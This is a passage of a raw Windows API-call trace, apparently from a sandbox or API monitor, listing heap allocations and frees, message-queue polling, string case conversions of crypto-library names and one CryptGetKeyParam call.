(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0189.150] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0189.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.151] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0189.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0189.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0189.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.151] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0189.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.152] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0189.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.153] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0189.154] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0189.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0189.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0189.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0189.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.155] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0189.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0189.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0189.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0189.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0189.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0189.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0189.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0189.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0189.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.159] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2668, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2668*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0189.159] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.159] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.160] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0189.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.160] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.160] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.160] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.160] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.160] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.160] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.161] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.161] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0189.161] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.161] HeapFree (in: hHeap=0x8a0000, 